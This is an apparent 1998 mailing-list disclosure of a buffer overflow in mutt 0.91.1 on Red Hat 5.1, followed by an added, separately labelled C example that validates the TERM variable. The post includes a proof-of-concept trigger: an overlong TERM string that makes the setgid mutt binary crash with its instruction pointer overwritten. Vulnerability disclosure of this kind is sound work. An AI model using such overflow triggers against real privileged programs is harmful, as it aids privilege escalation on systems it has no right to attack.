mutt buffer overflow?
From: jn1 () ATOMNET PL (funkySh)
Date: Thu, 22 Oct 1998 09:24:51 +0200
Sorry if this is already known..
There have been some posts about the buffer overflow in mutt,
(by sending a specially formatted Content-Type) here is another
one (I think exploitable) in mutt 0.91.1-2 shipped with
RH 5.1 with setgid mail
[orbital@PulpFiction /]$ TERM=`perl -e 'print "A" x 240'`
[orbital@PulpFiction /]$ mutt
[orbital@PulpFiction /]$ gdb /usr/bin/mutt
Starting program: /usr/bin/mutt
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
Mutt 0.91.1-5 still has the same problem but setgid mail is turned off..
funkySh jn1 () atomnet pl
PGP keyID: 768/D837F9A1
fingerprint 36 78 A6 D7 55 38 12 51 05 93 36 65 A0 6E 6D 22
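
Added example, not part of the original post and not mutt's code: one way a setgid program can treat TERM as untrusted input before any terminal-handling code sees it. The post does not identify the buffer that overflows, so the 64-byte limit, the function name safe_term_name and the "dumb" fallback are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define TERM_MAX 64 /* assumed limit; the post gives no buffer size */

/* Pattern to avoid in a privileged program: an unbounded copy of
 * environment data into a fixed buffer, e.g.
 *     char name[TERM_MAX]; strcpy(name, getenv("TERM"));
 * A 240-byte TERM, as in the post, would run past the end of name. */

/* Copy a terminal name into dst only if it fits (with its NUL) and uses
 * characters found in terminal names. Returns 0 on success; returns -1
 * and leaves "dumb" in dst when the value is missing, too long or odd. */
int safe_term_name(const char *value, char *dst, size_t dstlen)
{
    static const char fallback[] = "dumb";
    size_t i;

    if (dst == NULL || dstlen < sizeof fallback)
        return -1;
    memcpy(dst, fallback, sizeof fallback);
    if (value == NULL || value[0] == '\0')
        return -1;
    for (i = 0; value[i] != '\0'; i++) {
        unsigned char c = (unsigned char)value[i];
        if (i + 1 >= dstlen) /* no room left for this byte plus NUL */
            return -1;
        if (!isalnum(c) && c != '-' && c != '_' && c != '+' && c != '.')
            return -1;
    }
    memcpy(dst, value, i + 1); /* i + 1 <= dstlen is guaranteed here */
    return 0;
}

int main(void)
{
    char name[TERM_MAX];

    if (safe_term_name(getenv("TERM"), name, sizeof name) != 0) {
        fprintf(stderr, "TERM rejected, using \"%s\"\n", name);
        setenv("TERM", name, 1); /* libraries called later see the safe value */
    }
    printf("terminal type: %s\n", name);
    return 0;
}
```

Overwriting TERM in the environment matters because the terminal library reads the variable itself, so validating a private copy alone would not protect it.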